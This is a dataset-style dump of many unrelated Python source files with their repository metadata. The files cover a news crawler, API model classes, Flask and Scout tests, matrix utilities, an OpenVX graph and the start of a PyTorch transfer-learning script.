from helper import KafkaHelper
def new_crawl(link, kafka=False):
url = link
item_info = requests.get(url).text
soup = BeautifulSoup(item_info, 'html.parser')
title = soup.select('div.content03 header.title-article01 h1')[0].get_text()
time = soup.select('div.content03 header.title-article01 p')[0].get_text()[4:]
img_url = f"https:{soup.select('div.img-con span img')[0]['src']}"
raw_content = soup.select('div.story-news.article')
# print(raw_content)
content_p = [item.select("p") for item in raw_content]
content_text = [item.get_text().strip() for item in content_p[0]]
content = "\n".join(content_text[1:])
data_dict = {
"title": title,
"content": content,
"link": link
}
if kafka:
KafkaHelper.pub_ninput(data_dict)
else:
data_dict["time"] = time
data_dict["img_url"] = img_url
return data_dict
def recent_new_check():
past_list = ""
while True:
url = f'https://www.yna.co.kr/news?site=navi_latest_depth01'
item_info = requests.get(url).text
soup = BeautifulSoup(item_info, 'html.parser')
new_a_tag = soup.select('div.list-type038 ul')[0].select("li")[0].select("div div a.tit-wrap")
current_link = f"https:{new_a_tag[0]['href']}"
if past_list == current_link:
continue
else:
new_crawl(current_link, True)
past_list = current_link
recent_new_check()
|
[
"[email protected]"
] | |
d309ba906885b2264436cea4fe7c0b1cb6487058
|
9edaf93c833ba90ae9a903aa3c44c407a7e55198
|
/travelport/models/special_equipment_1.py
|
d0b34a9eefba484eaeb14ea03e11c478e502ee89
|
[] |
no_license
|
tefra/xsdata-samples
|
c50aab4828b8c7c4448dbdab9c67d1ebc519e292
|
ef027fe02e6a075d8ed676c86a80e9647d944571
|
refs/heads/main
| 2023-08-14T10:31:12.152696 | 2023-07-25T18:01:22 | 2023-07-25T18:01:22 | 222,543,692 | 6 | 1 | null | 2023-06-25T07:21:04 | 2019-11-18T21:00:37 |
Python
|
UTF-8
|
Python
| false | false | 1,577 |
py
|
from __future__ import annotations
from dataclasses import dataclass, field
from travelport.models.type_element_status_1 import TypeElementStatus1
__NAMESPACE__ = "http://www.travelport.com/schema/common_v52_0"
@dataclass
class SpecialEquipment1:
"""
Parameters
----------
key
type_value
Special equipment associated with a specific vehicle
el_stat
This attribute is used to show the action results of an element.
Possible values are "A" (when elements have been added to the UR)
and "M" (when existing elements have been modified). Response only.
key_override
If a duplicate key is found where we are adding elements in some
cases like URAdd, then instead of erroring out set this attribute to
true.
"""
class Meta:
name = "SpecialEquipment"
namespace = "http://www.travelport.com/schema/common_v52_0"
key: None | str = field(
default=None,
metadata={
"name": "Key",
"type": "Attribute",
}
)
type_value: None | str = field(
default=None,
metadata={
"name": "Type",
"type": "Attribute",
"required": True,
}
)
el_stat: None | TypeElementStatus1 = field(
default=None,
metadata={
"name": "ElStat",
"type": "Attribute",
}
)
key_override: None | bool = field(
default=None,
metadata={
"name": "KeyOverride",
"type": "Attribute",
}
)
|
[
"[email protected]"
] | |
e8611029177ec93e595d82b86b795cbc307b7108
|
d4ab63e2ff846ff509ab3b8a191381bdf8197325
|
/project/test_main.py
|
8544ed907817ff34f90b366519a3db4337d52c5e
|
[] |
no_license
|
ibrobabs/task
|
c2c95d8c83340a38be0ff8a1d7d3da55de33a097
|
82adc4fa54ab9c3606b2770325454916c7f75693
|
refs/heads/master
| 2021-01-18T17:45:31.392805 | 2017-04-01T05:22:24 | 2017-04-01T05:22:24 | 86,812,161 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,298 |
py
|
import os
import unittest
from project import app, db
from project.config import basedir
from project.models import User
TEST_DB = 'test.db'
class MainTests(unittest.TestCase):
#Setup and Teardown
def setUp(self):
app.config['TESTING'] = True
app.config['WTF_CSRF_ENABLED'] = False
# app.config['DEBUG'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \
os.path.join(basedir, TEST_DB)
self.app = app.test_client()
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
# helper methods
def login(self, name, password):
return self.app.post('/', data=dict(
name=name, password=password), follow_redirects=True)
# tests
def test_404_error(self):
response = self.app.get('/this-route-does-not-exist/')
self.assertEquals(response.status_code, 404)
self.assertIn(b"Sorry. There's nothing here.", response.data)
def test_500_error(self):
bad_user = User(
name='Jeremy',
email='[email protected]',
password='django'
)
db.session.add(bad_user)
db.session.commit()
self.assertRaises(ValueError, self.login, 'Jeremy', 'django')
try:
response = self.login('Jeremy', 'django')
self.assertEquals(response.status_code, 500)
except ValueError:
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
37e7b65b2eb87e028e91d5e800045af24ea8b6c0
|
b0a217700c563c4f057f2aebbde8faba4b1b26d2
|
/software/glasgow/arch/jtag.py
|
7c4fe835ca1a2bd2417ce6ed37892e998c03caf9
|
[
"0BSD",
"Apache-2.0"
] |
permissive
|
kbeckmann/Glasgow
|
5d183865da4fb499099d4c17e878a76192b691e7
|
cd31e293cb99ee10a3e4a03ff26f6f124e512c64
|
refs/heads/master
| 2021-09-15T15:59:38.211633 | 2018-11-15T22:36:04 | 2018-11-22T21:13:59 | 157,077,707 | 3 | 0 |
NOASSERTION
| 2018-11-11T12:33:49 | 2018-11-11T12:33:48 | null |
UTF-8
|
Python
| false | false | 250 |
py
|
# Ref: IEEE 1149.1
from bitarray import bitarray
from ..support.bits import *
__all__ = [
# DR
"DR_IDCODE",
]
DR_IDCODE = Bitfield("DR_IDCODE", 4, [
("present", 1),
("mfg_id", 11),
("part_id", 16),
("version", 4),
])
|
[
"[email protected]"
] | |
97450e3407268358d4f64aefe3120b8487b3401e
|
425db5a849281d333e68c26a26678e7c8ce11b66
|
/maths/fast_pow_and_matrix_multi.py
|
987f29bb269b191cf1b8759d9bc80770e1b3e800
|
[
"MIT"
] |
permissive
|
lih627/python-algorithm-templates
|
e8092b327a02506086414df41bbfb2af5d6b06dc
|
a61fd583e33a769b44ab758990625d3381793768
|
refs/heads/master
| 2021-07-23T17:10:43.814639 | 2021-01-21T17:14:55 | 2021-01-21T17:14:55 | 238,456,498 | 29 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,500 |
py
|
import random
def fpowx(x, n):
"""
quick pow: x ** n
"""
res = 1
while n:
if n & 1:
res = res * x
# compute x^2 x^4 x^8
x *= x
n >>= 1
return res
def fmulti(m, n, mod=10 ** 9 + 7):
"""
并没有提速的效果
只是对于其他语言 如c
防止溢出
对 python 没有任何帮助
"""
res = 0
while n:
if n & 1:
res += m
m = (m + m) % mod
res %= mod
n >>= 1
return res
def matrix_multiply(matrix_a, matrix_b):
# 模 MOD 乘法/加法
MOD = 10 ** 9 + 7
n_row = len(matrix_a)
n_col = len(matrix_b[0])
n_tmp = len(matrix_a[0])
matrix_c = [[0 for _ in range(n_col)] for _ in range(n_row)]
for i in range(n_row):
for j in range(n_col):
for k in range(n_tmp):
matrix_c[i][j] += matrix_a[i][k] * matrix_b[k][j] % MOD
matrix_c[i][j] %= MOD
return matrix_c
def get_unit_matrix(n):
# matrix I
unit_matrix = [[0 for _ in range(n)] for _ in range(n)]
for _ in range(n):
unit_matrix[_][_] = 1
return unit_matrix
def quick_matrix_pow(matrix_a, n):
# A ^ n
l = len(matrix_a)
res = get_unit_matrix(l)
while n:
if n & 1:
res = matrix_multiply(res, matrix_a)
a = matrix_multiply(a, a)
n >>= 1
return res
def test_fmulti():
m = random.randint(10 ** 9, 10 ** 15)
n = random.randint(10 ** 9, 10 ** 15)
res = fmulti(m, n)
return res
def multi(m, n, mod=10 ** 9 + 7):
return m * n % mod
def test_multi():
m = random.randint(10 ** 9, 10 ** 15)
n = random.randint(10 ** 9, 10 ** 15)
res = multi(m, n)
return res
if __name__ == '__main__':
print('fast pow: 2 ** 11: {}'.format(fpowx(2, 11)))
print(fmulti(987654, 987654321))
print(987654 * 987654321 % (10 ** 9 + 7))
# test the speed of fast(?)-multi
import timeit
T_fmulti = timeit.Timer('test_fmulti()',
'from __main__ import test_fmulti')
print('f_multi: {:.6f}s'.format(T_fmulti.timeit(number=1000)))
T_multi = timeit.Timer('test_multi()',
'from __main__ import test_multi')
print('s_multi: {:.6f}s'.format(T_multi.timeit(number=1000)))
# test matrix multiply
a = [[1, 2, 3], [4, 5, 6]]
b = [[1, 2], [3, 4], [5, 6]]
c = matrix_multiply(a, b)
print("a = {}\nb = {}\nc = {}".format(a, b, c))
|
[
"[email protected]"
] | |
f4506a41f21652bd250f6896810cd6fbdec72bfb
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03042/s013075072.py
|
044f87c3be49952ef7be8bf867e28108c9b4cd05
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 186 |
py
|
s=int(input())
a=s//100
b=s%100
if a>0 and a<=12:
if b>0 and b<=12:
print("AMBIGUOUS")
else:
print("MMYY")
else:
if b>0 and b<=12:
print("YYMM")
else:
print("NA")
|
[
"[email protected]"
] | |
62b6273166486acf1ece5437a98e41a0350b1124
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_celebrating.py
|
305a78d8f0d008577d0f029e5a82a8910f663133
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 261 |
py
|
from xai.brain.wordbase.verbs._celebrate import _CELEBRATE
#calss header
class _CELEBRATING(_CELEBRATE, ):
def __init__(self,):
_CELEBRATE.__init__(self)
self.name = "CELEBRATING"
self.specie = 'verbs'
self.basic = "celebrate"
self.jsondata = {}
|
[
"[email protected]"
] | |
2f0cb96aaa337f7309712bd930d65de11673c433
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/Pytest/pytest-django/pytest_django/plugin.py
|
cbfe15f79cb04f0e152ebe02bc8b4d3886108f5f
|
[
"BSD-3-Clause"
] |
permissive
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null |
UTF-8
|
Python
| false | false | 130 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:4b9c174912c01ae59fb496601d8c4ecf26765ee33134d079295304c25873875a
size 26008
|
[
"[email protected]"
] | |
1731a6bc44fffbafb6437d4bb39a9bb76acfeb29
|
45c170fb0673deece06f3055979ece25c3210380
|
/toontown/coghq/BossbotCountryClubMazeRoom_Battle00.py
|
218b80966c9553066709cc1c2f781554cc97b785
|
[] |
no_license
|
MTTPAM/PublicRelease
|
5a479f5f696cfe9f2d9dcd96f378b5ce160ec93f
|
825f562d5021c65d40115d64523bb850feff6a98
|
refs/heads/master
| 2021-07-24T09:48:32.607518 | 2018-11-13T03:17:53 | 2018-11-13T03:17:53 | 119,129,731 | 2 | 6 | null | 2018-11-07T22:10:10 | 2018-01-27T03:43:39 |
Python
|
UTF-8
|
Python
| false | false | 2,389 |
py
|
#Embedded file name: toontown.coghq.BossbotCountryClubMazeRoom_Battle00
from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr',
'name': 'LevelMgr',
'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_12/models/bossbotHQ/BossbotMazex1_C',
'wantDoors': 1},
1001: {'type': 'editMgr',
'name': 'EditMgr',
'parentEntId': 0,
'insertEntity': None,
'removeEntity': None,
'requestNewEntity': None,
'requestSave': None},
0: {'type': 'zone',
'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
110000: {'type': 'battleBlocker',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-131.21, 84.92, 0),
'hpr': Point3(270, 0, 0),
'scale': Vec3(1, 1, 1),
'cellId': 0,
'radius': 10},
110202: {'type': 'door',
'name': '<unnamed>',
'comment': '',
'parentEntId': 110001,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1,
'color': Vec4(1, 1, 1, 1),
'isLock0Unlocked': 1,
'isLock1Unlocked': 0,
'isLock2Unlocked': 1,
'isLock3Unlocked': 1,
'isOpen': 0,
'isOpenEvent': 0,
'isVisBlocker': 0,
'secondsOpen': 1,
'unlock0Event': 0,
'unlock1Event': 110000,
'unlock2Event': 0,
'unlock3Event': 0},
110002: {'type': 'maze',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-141.563, -78.8353, 0),
'hpr': Vec3(0, 0, 0),
'scale': Vec3(1, 1, 1),
'numSections': 1},
10002: {'type': 'nodepath',
'name': 'props',
'comment': '',
'parentEntId': 0,
'pos': Point3(0, 0, 0),
'hpr': Vec3(0, 0, 0),
'scale': 1},
110001: {'type': 'nodepath',
'name': '<unnamed>',
'comment': '',
'parentEntId': 0,
'pos': Point3(-106.91, 82.6953, 0),
'hpr': Point3(270, 0, 0),
'scale': Vec3(1, 1, 1)}}
Scenario0 = {}
levelSpec = {'globalEntities': GlobalEntities,
'scenarios': [Scenario0]}
|
[
"[email protected]"
] | |
c5020aa411c33ba9eb808cd247fe814f9c0ece17
|
8f5f92beeaefcd9effc93da87b26acb5ea159274
|
/xtorch/modules/seq2seq_encoders/seq2seq_encoder.py
|
edcdada140696dba36c224bbb20440c20a1c8b5f
|
[
"MIT"
] |
permissive
|
altescy/xtorch
|
15f984bf08654dc00fc1be603cca696676428cc1
|
bcbbbe645f4d62c211af5b3555c526cc60792c32
|
refs/heads/main
| 2023-04-12T15:45:52.192602 | 2021-04-25T11:35:45 | 2021-04-25T11:35:45 | 361,373,990 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 805 |
py
|
from typing import Optional
import torch
class Seq2seqEncoder(torch.nn.Module):
def forward(
self,
inputs: torch.Tensor,
mask: Optional[torch.BoolTensor] = None,
) -> torch.Tensor:
"""
Parameters
==========
inputs: `torch.Tensor`
Tensor of shape (batch_size, sequence_length, embedding_size).
mask: `torch.BoolTensor`, optional (default = None)
BoolTensor of shape (batch_size, sequence_length).
Return
======
output:
Tensor of shape (batch_size, sequence_length, encoding_size).
"""
raise NotImplementedError
def get_input_dim(self) -> int:
raise NotImplementedError
def get_output_dim(self) -> int:
raise NotImplementedError
|
[
"[email protected]"
] | |
e32d9ecd5addc70ef1833cfb869c834a230a4f2c
|
7f97814acd76ca96aee877fd70d401380f848fae
|
/7_training/re_start_end.py
|
e5842c00b391813441ccd2346854697e29805bbb
|
[] |
no_license
|
tberhanu/all_trainings
|
80cc4948868928af3da16cc3c5b8a9ab18377d08
|
e4e83d7c71a72e64c6e55096a609cec9091b78fa
|
refs/heads/master
| 2020-04-13T12:12:21.272316 | 2019-03-16T04:22:20 | 2019-03-16T04:22:20 | 163,195,802 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 485 |
py
|
"""
https://www.hackerrank.com/challenges/re-start-re-end/problem?h_r=next-challenge&h_v=zen
"""
# Enter your code here. Read input from STDIN. Print output to STDOUT
import re
s, k = input(), input()
i = 0
found = False
while i < len(s):
string = s[i:]
match = re.match(r'{}'.format(k), string)
if match == None:
i = i + 1
else:
found = True
print((match.start() + i, match.end() + i - 1))
i = i + 1
if not found:
print('(-1, -1')
|
[
"[email protected]"
] | |
edcbbc430b0d1a558d19be8a4a2625b7c762eb20
|
5add80be09ee754fced03e512a9acc214971cddf
|
/python-code/openvx-learning/helloworld.py
|
61352b55542a81f5e56cc66c6767ea1beb6c1d65
|
[
"Apache-2.0"
] |
permissive
|
juxiangwu/image-processing
|
f774a9164de9c57e88742e6185ac3b28320eae69
|
c644ef3386973b2b983c6b6b08f15dc8d52cd39f
|
refs/heads/master
| 2021-06-24T15:13:08.900960 | 2019-04-03T10:28:44 | 2019-04-03T10:28:44 | 134,564,878 | 15 | 5 | null | null | null | null |
UTF-8
|
Python
| false | false | 935 |
py
|
from pyvx import vx
context = vx.CreateContext()
images = [
vx.CreateImage(context, 640, 480, vx.DF_IMAGE_UYVY),
vx.CreateImage(context, 640, 480, vx.DF_IMAGE_S16),
vx.CreateImage(context, 640, 480, vx.DF_IMAGE_U8),
]
graph = vx.CreateGraph(context)
virts = [
vx.CreateVirtualImage(graph, 0, 0, vx.DF_IMAGE_VIRT),
vx.CreateVirtualImage(graph, 0, 0, vx.DF_IMAGE_VIRT),
vx.CreateVirtualImage(graph, 0, 0, vx.DF_IMAGE_VIRT),
vx.CreateVirtualImage(graph, 0, 0, vx.DF_IMAGE_VIRT),
]
vx.ChannelExtractNode(graph, images[0], vx.CHANNEL_Y, virts[0])
vx.Gaussian3x3Node(graph, virts[0], virts[1])
vx.Sobel3x3Node(graph, virts[1], virts[2], virts[3])
vx.MagnitudeNode(graph, virts[2], virts[3], images[1])
vx.PhaseNode(graph, virts[2], virts[3], images[2])
status = vx.VerifyGraph(graph)
if status == vx.SUCCESS:
status = vx.ProcessGraph(graph)
else:
print("Verification failed.")
vx.ReleaseContext(context)
|
[
"[email protected]"
] | |
d92df5cd630581d42b06e50bdc1070c5d414a17c
|
9647524c0f4d93fb1c8a992c20fe9f9d2710cde3
|
/2-content/Python/intro_programming-master/scripts/remove_input_references.py
|
2ab8878b1a362f079adf49a971ef71aa7677a4ea
|
[
"MIT"
] |
permissive
|
bgoonz/web-dev-notes-resource-site
|
16161aa68e8eecafeaba4dc7abeb957aaee864c5
|
e7dc9c30393597cb39830c49c3f51c1486b97584
|
refs/heads/master
| 2023-09-01T14:04:20.867818 | 2021-06-17T07:56:20 | 2021-06-17T07:56:20 | 329,194,347 | 7 | 5 |
MIT
| 2021-07-05T06:36:49 | 2021-01-13T04:34:20 |
JavaScript
|
UTF-8
|
Python
| false | false | 1,306 |
py
|
# This script removes the input reference numbers from html pages.
# They play a useful role in scientific notebooks, but they are really
# just visual clutter in this project.
# Could be an nbconvert setting, but it's an easy enough scripting job.
import os
import sys
print("\nStripping input reference numbers from code cells...")
# Find all files to work with.
path_to_notebooks = '/srv/projects/intro_programming/intro_programming/notebooks/'
filenames = []
for filename in os.listdir(path_to_notebooks):
if '.html' in filename and filename != 'index.html':
filenames.append(filename)
# one file for testing:
#filenames = ['hello_world.html']
for filename in filenames:
f = open(path_to_notebooks + filename, 'r')
lines = f.readlines()
f.close()
f = open(path_to_notebooks + filename, 'wb')
for line in lines:
# Unwanted lines have opening and closing div on same line,
# with input reference number between them.
if ('<div class="prompt input_prompt">' in line
and '</div>' in line):
# Don't write this line.
continue
else:
# Regular line, write it.
f.write(line.encode('utf-8'))
f.close()
print(" Stripped input reference numbers.\n")
|
[
"[email protected]"
] | |
dd55eae4011f0cb80d47c940385e7a3ff85cd7a3
|
602fa0e4ce194d3073d78230c61f7053281f9f9b
|
/code/python/src/categories/catutil.py
|
df03a0027b66f8d76d4265de7c7074d56b487bab
|
[] |
no_license
|
ziqizhang/wop
|
111cfdda1686a874ff1fc11a453a23fb52d43af1
|
ea0c37f444de9f2d5303f74b989f6d1a09feb61d
|
refs/heads/master
| 2022-09-14T20:14:11.575021 | 2021-12-10T21:23:24 | 2021-12-10T21:23:24 | 166,239,995 | 2 | 1 | null | 2022-09-01T23:11:13 | 2019-01-17T14:33:51 |
Python
|
UTF-8
|
Python
| false | false | 2,128 |
py
|
import pandas as pd
from nltk import PorterStemmer, WordNetLemmatizer
import numpy
from categories import cleanCategories as cc
stemmer = PorterStemmer()
lemmatizer = WordNetLemmatizer()
#0=stem; 1=lem; else=nothing
def normalise_categories(in_file_name, col, stem_or_lem):
df = pd.read_csv(in_file_name, header=0, delimiter=";", quoting=0, encoding="utf-8",
).as_matrix()
norm_cats=set()
max_toks=0
for r in df:
c = r[col]
if type(c) is not str and numpy.isnan(c):
c="NONE"
toks = len(c.split(" "))
if toks>max_toks:
max_toks=toks
if stem_or_lem==0:
c=stemmer.stem(c).strip()
if len(c)>2:
norm_cats.add(c)
elif stem_or_lem==1:
c=lemmatizer.lemmatize(c).strip()
if len(c)>2:
norm_cats.add(c)
else:
norm_cats.add(c)
norm_cats_list=list(norm_cats)
norm_cats_list=sorted(norm_cats_list)
print(len(norm_cats_list))
print(max_toks)
for nc in norm_cats_list:
print(nc)
def get_parent_category_level(in_file_name, col):
df = pd.read_csv(in_file_name, header=0, delimiter=";", quoting=0, encoding="utf-8",
).as_matrix()
norm_cats = set()
norm_cats_list=[]
for r in df:
c = r[col]
if type(c) is not str and numpy.isnan(c):
continue
c= cc.normaliseCategories(c)
try:
trim = c.index(">")
except ValueError:
continue
c=c[0:trim].strip()
norm_cats.add(c)
norm_cats_list.append(c)
norm_cats_unique_list=sorted(list(norm_cats))
norm_cats=sorted(norm_cats)
for nc in norm_cats:
print(nc)
print("\n\n>>>>>>>>>\n\n")
for nc in norm_cats_unique_list:
print(nc)
if __name__ == "__main__":
# normalise_categories("/home/zz/Work/data/wop_data/goldstandard_eng_v1_cleanedCategories.csv",
# 13,0)
get_parent_category_level("/home/zz/Work/data/wop_data/goldstandard_eng_v1_utf8.csv",
8)
|
[
"[email protected]"
] | |
d384f24b5c0b0b257f66b1db1a63854c59b95395
|
3e4c69317323bca865b025503b60bf83d3ae65f8
|
/tests/server/blueprints/variants/test_variant_views_variant.py
|
c1fd7fe078f8967099df90b24cb215c5a79a60ac
|
[
"BSD-3-Clause"
] |
permissive
|
tapaswenipathak/scout
|
f59beaa997a45487ac96c3b3e560b5e5aa9b30ae
|
c9b3ec14f5105abe6066337110145a263320b4c5
|
refs/heads/master
| 2020-05-30T11:13:25.662300 | 2019-05-28T09:26:25 | 2019-05-28T09:26:25 | 189,694,812 | 1 | 0 |
BSD-3-Clause
| 2019-06-01T05:36:35 | 2019-06-01T05:36:34 | null |
UTF-8
|
Python
| false | false | 1,207 |
py
|
# -*- coding: utf-8 -*-
import logging
from flask import url_for
log = logging.getLogger(__name__)
def test_server_variant(app, real_adapter):
# GIVEN an initialized app
# GIVEN a valid user, institute, case and variant
adapter = real_adapter
variant_obj = adapter.variant_collection.find_one()
assert variant_obj
with app.test_client() as client:
# GIVEN that the user could be logged in
resp = client.get(url_for('auto_login'))
assert resp.status_code == 200
internal_case_id = variant_obj['case_id']
case = adapter.case(internal_case_id)
case_name = case['display_name']
owner = case['owner']
# NOTE needs the actual document_id, not the variant_id
variant_id = variant_obj['_id']
log.debug('Inst {} case {} variant {}'.format(owner,case_name,
variant_id))
# WHEN accessing the variant page
resp = client.get(url_for('variants.variant',
institute_id=owner,
case_name=case_name,
variant_id=variant_id))
log.debug("{}",resp.data)
# THEN it should return a page
assert resp.status_code == 200
|
[
"[email protected]"
] | |
d0a3f8fea955cd6b7239c30eb4bde72572683e27
|
f2f88a578165a764d2ebb4a022d19e2ea4cc9946
|
/pyvisdk/do/guest_authentication.py
|
f16ac39d82372db0665b605fca27476d5d281d82
|
[
"MIT"
] |
permissive
|
pombredanne/pyvisdk
|
1ecc68a1bf264095f72f274c776e5868fb302673
|
de24eb4426eb76233dc2e57640d3274ffd304eb3
|
refs/heads/master
| 2021-01-21T16:18:39.233611 | 2014-07-28T19:50:38 | 2014-07-28T19:50:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,039 |
py
|
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def GuestAuthentication(vim, *args, **kwargs):
'''GuestAuthentication is an abstract base class for authentication in the guest.'''
obj = vim.client.factory.create('ns0:GuestAuthentication')
# do some validation checking...
if (len(args) + len(kwargs)) < 1:
raise IndexError('Expected at least 2 arguments got: %d' % len(args))
required = [ 'interactiveSession' ]
optional = [ 'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
|
[
"[email protected]"
] | |
dd42b52d712e69767f647a33a975f897d68b913f
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/OssDirectoryDetail.py
|
7b7aed746981c86b4885e7159246c6f7d6a7017c
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 2,270 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class OssDirectoryDetail(object):
def __init__(self):
self._acl = None
self._file_id = None
self._file_name = None
self._last_modified = None
@property
def acl(self):
return self._acl
@acl.setter
def acl(self, value):
self._acl = value
@property
def file_id(self):
return self._file_id
@file_id.setter
def file_id(self, value):
self._file_id = value
@property
def file_name(self):
return self._file_name
@file_name.setter
def file_name(self, value):
self._file_name = value
@property
def last_modified(self):
return self._last_modified
@last_modified.setter
def last_modified(self, value):
self._last_modified = value
def to_alipay_dict(self):
params = dict()
if self.acl:
if hasattr(self.acl, 'to_alipay_dict'):
params['acl'] = self.acl.to_alipay_dict()
else:
params['acl'] = self.acl
if self.file_id:
if hasattr(self.file_id, 'to_alipay_dict'):
params['file_id'] = self.file_id.to_alipay_dict()
else:
params['file_id'] = self.file_id
if self.file_name:
if hasattr(self.file_name, 'to_alipay_dict'):
params['file_name'] = self.file_name.to_alipay_dict()
else:
params['file_name'] = self.file_name
if self.last_modified:
if hasattr(self.last_modified, 'to_alipay_dict'):
params['last_modified'] = self.last_modified.to_alipay_dict()
else:
params['last_modified'] = self.last_modified
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = OssDirectoryDetail()
if 'acl' in d:
o.acl = d['acl']
if 'file_id' in d:
o.file_id = d['file_id']
if 'file_name' in d:
o.file_name = d['file_name']
if 'last_modified' in d:
o.last_modified = d['last_modified']
return o
|
[
"[email protected]"
] | |
dfc0cc855a774de8fa89bf5d0af2e7761c1399da
|
cf0ab8503d4d704045070deea1e2125375711e86
|
/apps/apikeys/v1/urls.py
|
1a8b15c264dc105260d2432da2775b98a3fb3a99
|
[] |
no_license
|
faierbol/syncano-platform
|
c3c6468600115752fd9fa5e46a0ad59f75f6bc9c
|
879111874d1ef70418b4890cf970720b0a2be4d8
|
refs/heads/master
| 2023-07-20T10:13:40.066127 | 2021-02-08T15:01:13 | 2021-02-08T15:01:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 198 |
py
|
# coding=UTF8
from rest_framework.routers import SimpleRouter
from apps.apikeys.v1 import views
router = SimpleRouter()
router.register('api_keys', views.ApiKeyViewSet)
urlpatterns = router.urls
|
[
"[email protected]"
] | |
42bdb6a885ac58d51bad36beea8877307f7902a5
|
eda9187adfd53c03f55207ad05d09d2d118baa4f
|
/algo/Transfer_Learning/Transfer_learning.py
|
725a6e82bceb8aa1d09e9cb263fc2fdf9da6aea1
|
[] |
no_license
|
HuiZhaozh/python_tutorials
|
168761c9d21ad127a604512d7c6c6b38b4faa3c7
|
bde4245741081656875bcba2e4e4fcb6b711a3d9
|
refs/heads/master
| 2023-07-07T20:36:20.137647 | 2020-04-24T07:18:25 | 2020-04-24T07:18:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,586 |
py
|
# -*- coding:utf-8 -*-
# /usr/bin/python
'''
-------------------------------------------------
File Name : Transfer_learning
Description : 迁移学习
Envs : pytorch
Author : yanerrol
Date : 2020/2/17 09:58
-------------------------------------------------
Change Activity:
2020/2/17 : new
-------------------------------------------------
'''
__author__ = 'yanerrol'
import torch
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import datasets
from torchvision import transforms
from torch.utils.data import DataLoader
#######################################
### PRE-TRAINED MODELS AVAILABLE HERE
## https://pytorch.org/docs/stable/torchvision/models.html
from torchvision import models
#######################################
if torch.cuda.is_available():
torch.backends.cudnn.deterministic = True
##########################
### SETTINGS
##########################
# Device
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print('Device:', DEVICE)
NUM_CLASSES = 10
# Hyperparameters
random_seed = 1
learning_rate = 0.0001
num_epochs = 10
batch_size = 128
##########################
### MNIST DATASET
##########################
custom_transform = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
])
## Note that this particular normalization scheme is
## necessary since it was used for pre-training
## the network on ImageNet.
## These are the channel-means and standard deviations
## for z-score normalization.
train_dataset = datasets.CIFAR10(root='data',
train=True,
transform=custom_transform,
download=True)
test_dataset = datasets.CIFAR10(root='data',
train=False,
transform=custom_transform)
train_loader = DataLoader(dataset=train_dataset,
batch_size=batch_size,
num_workers=8,
shuffle=True)
test_loader = DataLoader(dataset=test_dataset,
batch_size=batch_size,
num_workers=8,
shuffle=False)
# Checking the dataset
for images, labels in train_loader:
print('Image batch dimensions:', images.shape)
print('Image label dimensions:', labels.shape)
break
##########################
